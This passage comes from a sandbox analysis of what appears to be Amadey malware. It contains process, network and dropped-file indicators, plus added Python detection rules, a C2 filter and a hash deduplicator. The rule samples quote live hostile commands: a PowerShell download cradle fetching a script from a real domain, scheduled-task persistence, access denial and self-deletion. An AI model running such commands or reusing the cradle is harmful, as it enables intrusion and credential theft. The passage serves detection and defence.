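The process tree above shows the persistence sequence characteristic of Amadey, which the report flags: schtasks.exe creates a task that re-runs the copy at Temp\f22b669919\legenda.exe every minute, cacls.exe then denies the Admin user access to that file and its directory, a PowerShell download cradle pulls debug2.ps1 from www.mdegmm.com into memory, the sqlcmd.exe loader deletes itself behind a ping delay, rundll32.exe loads clip64.dll from %APPDATA%, and wmic.exe inventories OS, CPU and GPU. One caveat on the earlier "Adds Run key to start application" table: the wextract_cleanup RunOnce values (rundll32 advpack.dll,DelNodeRunDLL32 on the IXP00n.TMP directories) are written by the Windows wextract self-extractor to delete its own temp folders, so they explain the nested IXP00n.TMP layout but are not a persistence mechanism. The Python below is an added example, not part of the report: command-line rules written against the lines above, with the tag names and regexes being the editor's assumptions. The sample input is copied from the process tree plus one constructed benign line (a schtasks /Query) as a negative.

```python
"""Tag suspicious command lines from a sandbox process tree.

Added example, not part of the sandbox report. The rules are the editor's and
were written against the command lines in the process tree above; the tag
names are assumptions, not a published taxonomy."""
import re

RULES = [
    # Scheduled task re-running a binary dropped under %LOCALAPPDATA%\Temp every minute.
    ("persistence/schtasks-temp-binary",
     re.compile(r'schtasks(\.exe)?"?\s+/Create\b.*?/SC\s+MINUTE\b.*?/TR\s+"?[^"]*\\AppData\\Local\\Temp\\', re.I)),
    # cacls denying ("…:N") a user access to the dropped file or directory.
    ("defense-evasion/cacls-deny-access",
     re.compile(r'\bcacls\b.*?/P\s+"?[^"\s:]+:N\b', re.I)),
    # In-memory execution of a remote script.
    ("execution/powershell-download-cradle",
     re.compile(r'powershell.*\b(IEX|Invoke-Expression)\b.*DownloadString\(', re.I)),
    # ping used as a sleep, then deletion of the loader that spawned the command.
    ("defense-evasion/ping-delay-self-delete",
     re.compile(r'\bping\s+127\.0\.0\.1\b.*&&\s*del\s+', re.I)),
    # rundll32 calling an export of a DLL in a user-writable directory.
    ("execution/rundll32-user-writable-dll",
     re.compile(r'rundll32(\.exe)?"?\s+"?C:\\Users\\[^"]*\\AppData\\Roaming\\[^"]+\.dll\s*,', re.I)),
    # Host fingerprinting via WMI (OS caption, CPU, GPU).
    ("discovery/wmic-hardware-inventory",
     re.compile(r'\bwmic\b.*\b(os|cpu|path\s+win32_VideoController)\b.*\bget\b', re.I)),
]
URL_RE = re.compile(r'''DownloadString\(\s*['"]([^'"]+)['"]\s*\)''', re.I)

def classify(cmdline):
    """Return the rule tags that fire on one command line (empty list if none)."""
    return [tag for tag, rx in RULES if rx.search(cmdline)]

def cradle_urls(cmdlines):
    """Distinct URLs fetched by DownloadString(...) cradles, sorted."""
    return sorted({m.group(1) for c in cmdlines for m in URL_RE.finditer(c)})

def triage(cmdlines):
    """Group matching command lines by tag: {tag: [cmdline, ...]}."""
    report = {}
    for c in cmdlines:
        for tag in classify(c):
            report.setdefault(tag, []).append(c)
    return report

# Sample input: command lines copied from the process tree above; the last
# line is constructed (a harmless schtasks /Query) and must not match.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe" /F',
    r'CACLS "legenda.exe" /P "Admin:N"',
    r'CACLS "legenda.exe" /P "Admin:R" /E',
    r"powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')",
    r'"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe" >> NUL',
    r'ping 127.0.0.1',
    r'"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main',
    r'wmic os get Caption',
    r'cmd /C "wmic path win32_VideoController get name"',
    r'wmic cpu get name',
    r'"C:\Windows\System32\schtasks.exe" /Query /TN legenda.exe',
]

if __name__ == "__main__":
    for tag, hits in sorted(triage(SAMPLE_CMDLINES).items()):
        print(f"{tag}: {len(hits)} hit(s)")
    print("cradle URLs:", cradle_urls(SAMPLE_CMDLINES))
```

The cacls rule only fires on the deny (`:N`) write, not on the follow-up `Admin:R /E` grant, and the ping rule requires the `&& del` chain, so the bare `ping 127.0.0.1` child process stays untagged; the parent cmd.exe line is the one that carries the intent.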
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 32.146.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.81.184.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.150.43.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.192.144.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.122.125.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.113.223.173.in-addr.arpa | udp |
| DE | 193.233.20.30:4125 | | tcp |
| US | 8.8.8.8:53 | 30.20.233.193.in-addr.arpa | udp |
| US | 20.189.173.6:443 | | tcp |
| US | 8.8.8.8:53 | 202.74.101.95.in-addr.arpa | udp |
| DE | 193.233.20.30:4125 | | tcp |
| DE | 162.19.139.184:2222 | | tcp |
| RU | 62.204.41.87:80 | 62.204.41.87 | tcp |
| US | 8.8.8.8:53 | www.mdegmm.com | udp |
| US | 162.248.50.116:443 | www.mdegmm.com | tcp |
| US | 8.8.8.8:53 | 87.41.204.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.50.248.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.155.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ebfertility.com | udp |
| US | 89.190.157.61:80 | ebfertility.com | tcp |
| US | 162.248.50.116:443 | www.mdegmm.com | tcp |
| US | 8.8.8.8:53 | 61.157.190.89.in-addr.arpa | udp |
| US | 162.248.50.116:443 | www.mdegmm.com | tcp |
| LV | 195.123.211.54:80 | 195.123.211.54 | tcp |
| US | 8.8.8.8:53 | 54.211.123.195.in-addr.arpa | udp |
| NL | 185.246.221.126:80 | 185.246.221.126 | tcp |
| US | 8.8.8.8:53 | 126.221.246.185.in-addr.arpa | udp |
| NL | 212.87.204.93:8081 | | tcp |
| US | 8.8.8.8:53 | 93.204.87.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.13.109.52.in-addr.arpa | udp |
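Most rows in the Network table are noise for blocking purposes: the 8.8.8.8:53 rows are the sandbox resolver, and the in-addr.arpa names are reverse (PTR) lookups of addresses already contacted, not domains the sample chose. What remains is a handful of direct-to-IP connections on non-standard ports (193.233.20.30:4125, 162.19.139.184:2222, 212.87.204.93:8081) plus two resolved names (www.mdegmm.com, ebfertility.com). The Python below is an added example, not part of the report: it reads rows in the table's own layout, tolerates the export's shifted rows where the Domain cell is missing and "tcp" lands in its column, drops resolver and PTR traffic, and groups what is left by endpoint. The sample rows are copied from the table above (two of them in the shifted form as exported); the candidate list still needs allowlisting against known-good cloud ranges, since a connection such as 20.189.173.6:443 may be OS background traffic rather than C2.

```python
"""Separate C2 candidates from DNS noise in a sandbox network table.

Added example, not part of the sandbox report. Input rows follow the report's
"| Country | Destination | Domain | Proto |" layout; rows exported with the
Domain cell missing ("| DE | host:port | tcp | |") are parsed the same way."""

RESOLVER = "8.8.8.8:53"  # the sandbox's DNS resolver, as seen in the table above

def parse_row(line):
    """Return {country, dest, domain, proto} for one table row, or None for header/junk."""
    cells = [c.strip() for c in line.strip().strip("|").split("|")]
    if len(cells) < 3 or cells[0] == "Country":
        return None
    country, dest = cells[0], cells[1]
    rest = [c for c in cells[2:] if c]               # drop empty cells, wherever the shift put them
    proto = rest[-1].lower() if rest and rest[-1].lower() in ("tcp", "udp") else ""
    domain = rest[0] if len(rest) >= 2 else ""       # a domain is only present when two cells remain
    return {"country": country, "dest": dest, "domain": domain, "proto": proto}

def is_noise(r):
    """Resolver traffic and reverse lookups carry no attacker-chosen destination."""
    return r["dest"] == RESOLVER or r["domain"].endswith(".in-addr.arpa")

def c2_candidates(lines):
    """Group non-noise connections by endpoint: {host:port: {country, proto, domains, hits}}."""
    out = {}
    for line in lines:
        r = parse_row(line)
        if not r or is_noise(r):
            continue
        e = out.setdefault(r["dest"], {"country": r["country"], "proto": r["proto"],
                                       "domains": set(), "hits": 0})
        e["hits"] += 1
        host, _, _port = r["dest"].rpartition(":")
        if r["domain"] and r["domain"] != host:      # bare-IP rows repeat the host in the Domain cell
            e["domains"].add(r["domain"])
    return out

def dns_lookups(lines):
    """Forward names the sample resolved, sorted (PTR lookups excluded)."""
    names = set()
    for line in lines:
        r = parse_row(line)
        if r and r["dest"] == RESOLVER and not r["domain"].endswith(".in-addr.arpa"):
            names.add(r["domain"])
    return sorted(names)

# Sample input: rows copied from the Network table above, including two in the
# shifted form exactly as exported, plus the header line.
SAMPLE_ROWS = [
    "| Country | Destination | Domain | Proto |",
    "| US | 8.8.8.8:53 | 32.146.190.20.in-addr.arpa | udp |",
    "| DE | 193.233.20.30:4125 | tcp | |",
    "| US | 20.189.173.6:443 | tcp | |",
    "| DE | 193.233.20.30:4125 | | tcp |",
    "| DE | 162.19.139.184:2222 | | tcp |",
    "| RU | 62.204.41.87:80 | 62.204.41.87 | tcp |",
    "| US | 8.8.8.8:53 | www.mdegmm.com | udp |",
    "| US | 162.248.50.116:443 | www.mdegmm.com | tcp |",
    "| US | 8.8.8.8:53 | ebfertility.com | udp |",
    "| US | 89.190.157.61:80 | ebfertility.com | tcp |",
    "| LV | 195.123.211.54:80 | 195.123.211.54 | tcp |",
    "| NL | 185.246.221.126:80 | 185.246.221.126 | tcp |",
    "| NL | 212.87.204.93:8081 | | tcp |",
]

if __name__ == "__main__":
    for dest, e in sorted(c2_candidates(SAMPLE_ROWS).items()):
        names = ",".join(sorted(e["domains"])) or "-"
        print(f"{dest:24} {e['proto']:4} {e['country']:3} hits={e['hits']} domains={names}")
    print("resolved:", dns_lookups(SAMPLE_ROWS))
```

Endpoints with a domain attached (162.248.50.116:443 via www.mdegmm.com, 89.190.157.61:80 via ebfertility.com) are best blocked by name as well as by address, since the address behind a stager domain changes more often than the domain does.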
Files
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap5891.exe
| MD5 | fc26c666dd920ef5f62a921809bfdb3f |
| SHA1 | 05f344ecbbf3bfe10506c0ae0cf470e04b38a130 |
| SHA256 | 6ddd5f9b7ff79cf077c3170ec346cc7b375fadeec0bbca25d9a953ba1ee433d0 |
| SHA512 | b6311d9f3f4f7f56c0f67ffaa63d61bee13d2aacf8d59001d4cb7c24dfba616b3b5e243cb903277889633bbe9916d98a8bf7713f926bb2be7ea44868029ce8d7 |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap0848.exe
| MD5 | a8b42d7b4f7e1c00f3cba5e4bda409ec |
| SHA1 | d445a7106437457b60d4ab7686c21ef2b6b89410 |
| SHA256 | 1df60ed3d48851bc6abca9afe70d6e8590d5cf2631faa6d6d0bc47cae015b42a |
| SHA512 | c3a2dd272660ea9e674f2eec3d1668ca32970872dc51e281b860dfab368e14b97689bd80d7c81e4b75a33bb0d3a6bcd7c158d132841b595ee3510f9eab7fca39 |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap0004.exe
| MD5 | ae17216d1f1bdea2dbc09b5fc93eeaf0 |
| SHA1 | 5236dddde2727828419c74b2c4afceb6208ba934 |
| SHA256 | 88fbdd6069e0c3f376c64acfe0039e181d7adcda47bdcf4bf5945fd261958b25 |
| SHA512 | b121bb57ec1b7012045be0e0e4081aee1ce5f5197c1e697b5792c47618dd7d93c5312a400522ce1edbb007181f98a19bfcb6826f974b16b36c664a2ae7fe1791 |
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz1203.exe
| MD5 | 7e93bacbbc33e6652e147e7fe07572a0 |
| SHA1 | 421a7167da01c8da4dc4d5234ca3dd84e319e762 |
| SHA256 | 850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38 |
| SHA512 | 250169d7b6fcebff400be89edae8340f14130ced70c340ba9da9f225f62b52b35f6645bfb510962efb866f988688cb42392561d3e6b72194bc89d310ea43aa91 |
memory/2584-161-0x0000000000510000-0x000000000051A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v8031ED.exe
| MD5 | 684adbbd51718a391b8bbfc3b30abea9 |
| SHA1 | 9373cd2203db878158d7c2075a9289dbb7fd083b |
| SHA256 | a5e958d355a07ddaef51ec7b93806301047b366583df0e50d4c1ffaba2dc300c |
| SHA512 | b4ffd9804d6d4da878ae6312b334801efea416d96b7321d388c2070e01239940462f36081669edd71f298719df4e09e7bbec99001e03a107b8590e5a675dd433 |
memory/3228-167-0x0000000004D60000-0x0000000005304000-memory.dmp
memory/3228-168-0x0000000002690000-0x00000000026A2000-memory.dmp
memory/3228-169-0x0000000002690000-0x00000000026A2000-memory.dmp
memory/3228-171-0x0000000002690000-0x00000000026A2000-memory.dmp
memory/3228-173-0x0000000002690000-0x00000000026A2000-memory.dmp
memory/3228-175-0x0000000002690000-0x00000000026A2000-memory.dmp
memory/3228-177-0x0000000002690000-0x00000000026A2000-memory.dmp
memory/3228-179-0x0000000002690000-0x00000000026A2000-memory.dmp
memory/3228-182-0x0000000000720000-0x000000000074D000-memory.dmp
memory/3228-181-0x0000000002690000-0x00000000026A2000-memory.dmp
memory/3228-184-0x0000000004D50000-0x0000000004D60000-memory.dmp
memory/3228-185-0x0000000004D50000-0x0000000004D60000-memory.dmp
memory/3228-189-0x0000000002690000-0x00000000026A2000-memory.dmp
memory/3228-186-0x0000000002690000-0x00000000026A2000-memory.dmp
memory/3228-188-0x0000000004D50000-0x0000000004D60000-memory.dmp
memory/3228-191-0x0000000002690000-0x00000000026A2000-memory.dmp
memory/3228-193-0x0000000002690000-0x00000000026A2000-memory.dmp
memory/3228-195-0x0000000002690000-0x00000000026A2000-memory.dmp
memory/3228-197-0x0000000002690000-0x00000000026A2000-memory.dmp
memory/3228-199-0x0000000002690000-0x00000000026A2000-memory.dmp
memory/3228-200-0x0000000000400000-0x000000000071D000-memory.dmp
memory/3228-203-0x0000000004D50000-0x0000000004D60000-memory.dmp
memory/3228-204-0x0000000004D50000-0x0000000004D60000-memory.dmp
memory/3228-202-0x0000000004D50000-0x0000000004D60000-memory.dmp
memory/3228-205-0x0000000000400000-0x000000000071D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w13dW92.exe
| MD5 | edb722776ee0dc89710b814e6ad3cc97 |
| SHA1 | 4214b0b5e27f42119badb95846908f4816caf2c3 |
| SHA256 | b6843be0f61e97fa4f5131f2439f185726c6dc65cf5a86d74769037dece82bce |
| SHA512 | ce644b5f6acb682cce4cf859d62292fb2b1e3322667672dca096db55a9d0049469c4ca43db731b8251d0df76212edeb10126d0d63c6de97a67f27bba3923d9f8 |
memory/2552-210-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-211-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-213-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-215-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-217-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-219-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-221-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-223-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-225-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-229-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-227-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-231-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-233-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-237-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-235-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-242-0x0000000004D50000-0x0000000004D60000-memory.dmp
memory/2552-243-0x0000000004D50000-0x0000000004D60000-memory.dmp
memory/2552-240-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-239-0x0000000000810000-0x000000000085B000-memory.dmp
memory/2552-244-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-246-0x0000000004CD0000-0x0000000004D0E000-memory.dmp
memory/2552-1119-0x0000000005330000-0x0000000005948000-memory.dmp
memory/2552-1120-0x00000000059D0000-0x0000000005ADA000-memory.dmp
memory/2552-1121-0x0000000005B10000-0x0000000005B22000-memory.dmp
memory/2552-1122-0x0000000004D50000-0x0000000004D60000-memory.dmp
memory/2552-1123-0x0000000005B30000-0x0000000005B6C000-memory.dmp
memory/2552-1124-0x0000000005E20000-0x0000000005EB2000-memory.dmp
memory/2552-1125-0x0000000005EC0000-0x0000000005F26000-memory.dmp
memory/2552-1127-0x0000000004D50000-0x0000000004D60000-memory.dmp
memory/2552-1128-0x0000000004D50000-0x0000000004D60000-memory.dmp
memory/2552-1129-0x0000000004D50000-0x0000000004D60000-memory.dmp
memory/2552-1130-0x0000000004D50000-0x0000000004D60000-memory.dmp
memory/2552-1131-0x0000000007990000-0x0000000007B52000-memory.dmp
memory/2552-1132-0x0000000007B60000-0x000000000808C000-memory.dmp
memory/2552-1133-0x0000000008140000-0x00000000081B6000-memory.dmp
memory/2552-1134-0x00000000081D0000-0x0000000008220000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xkivC10.exe
| MD5 | 3389637c0d072121bf1b127629736d37 |
| SHA1 | 300e915efdf2479bfd0d3699c0a6bc51260f9655 |
| SHA256 | 2b74c4ce2674a8fc0c78fffa39c5de5e43ae28b8bf425349a5f97c6a61135153 |
| SHA512 | a32cc060d2600f6ca94ffdce07c95ea5e2f56c0b418260456b568cb41e5f55db0c4fc97c35ca4103c674e61a17300d834d2c0da5a78b7084b6bc342fd23a7fb4 |
memory/2748-1140-0x0000000000EA0000-0x0000000000ED2000-memory.dmp
memory/2748-1141-0x0000000005A20000-0x0000000005A30000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y67rZ35.exe
| MD5 | 5086db99de54fca268169a1c6cf26122 |
| SHA1 | 003f768ffcc99bda5cda1fb966fda8625a8fdc3e |
| SHA256 | 42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4 |
| SHA512 | 90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5 |
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
| MD5 | 5086db99de54fca268169a1c6cf26122 |
| SHA1 | 003f768ffcc99bda5cda1fb966fda8625a8fdc3e |
| SHA256 | 42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4 |
| SHA512 | 90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5 |
C:\Users\Admin\AppData\Local\Temp\1000115001\sqlcmd.exe
| MD5 | b5baf2e6261a1fb05bb2654c8d099dd6 |
| SHA1 | 2a5b25fcb9e9f584d0a162b734c7dcc53c6e0550 |
| SHA256 | 4a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d |
| SHA512 | 4ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
| MD5 | fc88b7748eb4cd37ae886a1c0813e4cf |
| SHA1 | 23e30b76fc94f0467a3efad342a91a3b84ff1eea |
| SHA256 | 3d81e317f8816680185517d7719e51fdbcd5807f9c629c4e3d0408820ec458da |
| SHA512 | bb8ffaa2e8e581aa8d9a2e39b5f16c784d1431b4c18acc71b8fea84a4982d13a8ed1e5cf295c459ca35d8d4604c050210e0771386e7fe57d35c5ccd41fb92211 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
| MD5 | af944e1415d153b99de41fa881129357 |
| SHA1 | 100e9b35145bd7c1905616164dfadba0f2654b49 |
| SHA256 | 1f3f31f4d272165cec155abd23fa48673a11fec5146dded9a5ff89818344c924 |
| SHA512 | e090c20e185a527c78fd2e6bc55540bf11a87afc44af2a750e2dbc6a008f158b4e934b60ae2ba95215fc5e0a59daca5abfa55ba9264505ad7ea5df2b87d50060 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
| MD5 | cb684ec7fe8555f949182c7423dafdc2 |
| SHA1 | ec49f7b4b777fa1da40af5328785782127ffc52c |
| SHA256 | 8e17b090e2d07abf04860e961e601d8c663d3eaafd16190e6e6b6a4f018c0b0e |
| SHA512 | ef627ca15ac143710b707ce28bd0cbe3447446db64c61f89d78f7c868cad07bd267563a7927ac4cd733adf2da3d58dcfadba54f8e0bc78e06d79cd389b77e500 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
| MD5 | 7896c09ccb60f8072e1d82985121072f |
| SHA1 | af60ca517412b2f27a249e9b5ad063ae532c3387 |
| SHA256 | 9d6171410dd8e26c6698676f4522d9de29c1013964be27ae851299775b9a079c |
| SHA512 | 44d738f7e0afe5a461d64af2938202b1e7604c4270b6e6b6ff52946b673416bc41f5acb242eb67d15d1ed7427913317eab981ebc32983d8faea29fa45433f587 |
memory/1328-1183-0x0000016A3C210000-0x0000016A3C232000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xqaerktg.0pm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1328-1191-0x0000016A3C0D0000-0x0000016A3C0E0000-memory.dmp
memory/1328-1192-0x0000016A3C0D0000-0x0000016A3C0E0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1000116001\serv.exe
| MD5 | 166d22ed93c723326a6d5fead162fdd3 |
| SHA1 | 17cfd9649a4f68ef90c72689820876dbe4ca22d1 |
| SHA256 | e9879548658614428c01bc7c4878bc87d0e2ad57b3621a7aa614e89c32c388e7 |
| SHA512 | c871182afed08bcbd73ea86d058973afd2602481497f752d7da46aad4d9a09ea39911010832e3bf4b68f5cf7ac73300169efeeeefe82a68a897f543f7dfc96f4 |
C:\Users\Admin\AppData\Local\Temp\1000118001\svchost.exe
| MD5 | a8a106555b9e1f92569d623c66ee8c12 |
| SHA1 | a5080c26b5f5911c10d80654c84239a226fc75d1 |
| SHA256 | 84aac7290471d6aa883962c2e739b44adcea7f533cc0317e8d0d6f847def1f7a |
| SHA512 | 9b9813b0b47e84523fc96cc427aa234d4533e77483ddf28dae35449570373370fdde4380877870aca634a9746b58743ea3c1d9ea31d7162d61d645ca58f60b26 |
memory/2796-1229-0x0000000000850000-0x000000000087E000-memory.dmp
memory/1328-1231-0x0000016A3C0D0000-0x0000016A3C0E0000-memory.dmp
memory/1328-1232-0x0000016A3C0D0000-0x0000016A3C0E0000-memory.dmp
memory/1328-1233-0x0000016A3C0D0000-0x0000016A3C0E0000-memory.dmp
memory/2796-1240-0x0000000000730000-0x000000000074C000-memory.dmp
memory/2796-1241-0x00000000001F0000-0x00000000001F2000-memory.dmp
memory/2796-1242-0x0000000002500000-0x0000000003500000-memory.dmp
memory/2796-1245-0x0000000000730000-0x000000000074C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
| MD5 | 5086db99de54fca268169a1c6cf26122 |
| SHA1 | 003f768ffcc99bda5cda1fb966fda8625a8fdc3e |
| SHA256 | 42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4 |
| SHA512 | 90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5 |
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll
| MD5 | 94cbeec5d4343918fd0e48760e40539c |
| SHA1 | a049266c5c1131f692f306c8710d7e72586ae79d |
| SHA256 | 48eb3ca078da2f5e9fd581197ae1b4dfbac6d86040addbb305e305c014741279 |
| SHA512 | 4e92450333d60b1977f75c240157a8589cfb1c80a979fbe0793cc641e13556004e554bc6f9f4853487dbcfcdc2ca93afe610649e9712e91415ed3f2a60d4fec0 |
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
| MD5 | 16cf28ebb6d37dbaba93f18320c6086e |
| SHA1 | eae7d4b7a9636329065877aabe8d4f721a26ab25 |
| SHA256 | c0603ed73299e59dc890ae194c552acd9d8a2aef2e1a9e76346ca672e3b14106 |
| SHA512 | f8eee1d4142483de223ddbefec43023fd167e41e358bf8994140e2dcc1712f49228dc92e4e237d1df4ffa6c948097a8309c84d60788a03babed668532c438fc2 |
C:\Users\Admin\AppData\Local\Temp\nJObCsNVlgTeMaPEZQleQYhYzRyWJjPj
| MD5 | 46988a922937a39036d6b71e62d0f966 |
| SHA1 | 4a997f2a0360274ec7990aac156870a5a7030665 |
| SHA256 | 5954db23a8424f6cb1e933387d0866910c45615f54342aa0f6dd597174393de6 |
| SHA512 | dd7774668cd24c303e670e7d096794aca67593b8d8a9b3b38aa08c148f67e74c07041f25941465b3ae030bafd76384b4b79d41c1eeebe5bd11d94ab25ef00e9d |
C:\Users\Admin\AppData\Local\Temp\RzLNTXYeUCWKsXbGyRAOmBTvKSJfjzaL
| MD5 | 18da5c19d469f921ff9d44f1f17de97b |
| SHA1 | bef606053494e1f516431d40f2aca29cf1deeb20 |
| SHA256 | 662f6389650db2471a13412664d05cfed46fef73dd1d30cf16d2c8ceeee33eb0 |
| SHA512 | 9eee1b05c10544813c2eb89c48369d78e5b9260fddd8e90a34f06ac8ea2955860083c6c8ac31089276e97e269b87b4ac0c43e9dcdb7bd6091759dccb4ac0e71d |
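The listing above is the raw dropped-file and memory-region output of the sandbox, and the same binary appears under several names (y67rZ35.exe and legenda.exe carry identical digests, and clip64.dll is listed more than once). The script below is an added example, not part of the sandbox report or of any tool it references: it parses this exact layout (a path line followed by `| MD5 | … |` style rows, interleaved with `memory/<pid>-<seq>-0x<start>-0x<end>-memory.dmp` lines), groups entries by SHA256 so each unique payload becomes one IOC, sanity-checks digest lengths against the algorithm, decodes the memory regions, and offers a hash-match helper. The embedded `SAMPLE_REPORT` is a short excerpt copied from the listing above; the function names are mine.

```python
"""Turn a sandbox dropped-file listing into deduplicated hash IOCs (added example)."""
import hashlib
import re
from collections import defaultdict

# Constructed sample: an excerpt in the same layout as the report listing
# (paths and digests copied from the page; a memory-region line in between).
SAMPLE_REPORT = r"""
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y67rZ35.exe
| MD5 | 5086db99de54fca268169a1c6cf26122 |
| SHA1 | 003f768ffcc99bda5cda1fb966fda8625a8fdc3e |
| SHA256 | 42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4 |
| SHA512 | 90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5 |
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe
| MD5 | 5086db99de54fca268169a1c6cf26122 |
| SHA1 | 003f768ffcc99bda5cda1fb966fda8625a8fdc3e |
| SHA256 | 42873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4 |
| SHA512 | 90531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5 |
memory/2748-1140-0x0000000000EA0000-0x0000000000ED2000-memory.dmp
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll
| MD5 | 94cbeec5d4343918fd0e48760e40539c |
| SHA1 | a049266c5c1131f692f306c8710d7e72586ae79d |
| SHA256 | 48eb3ca078da2f5e9fd581197ae1b4dfbac6d86040addbb305e305c014741279 |
| SHA512 | 4e92450333d60b1977f75c240157a8589cfb1c80a979fbe0793cc641e13556004e554bc6f9f4853487dbcfcdc2ca93afe610649e9712e91415ed3f2a60d4fec0 |
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
| MD5 | 16cf28ebb6d37dbaba93f18320c6086e |
| SHA1 | eae7d4b7a9636329065877aabe8d4f721a26ab25 |
| SHA256 | c0603ed73299e59dc890ae194c552acd9d8a2aef2e1a9e76346ca672e3b14106 |
| SHA512 | f8eee1d4142483de223ddbefec43023fd167e41e358bf8994140e2dcc1712f49228dc92e4e237d1df4ffa6c948097a8309c84d60788a03babed668532c438fc2 |
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
| MD5 | 16cf28ebb6d37dbaba93f18320c6086e |
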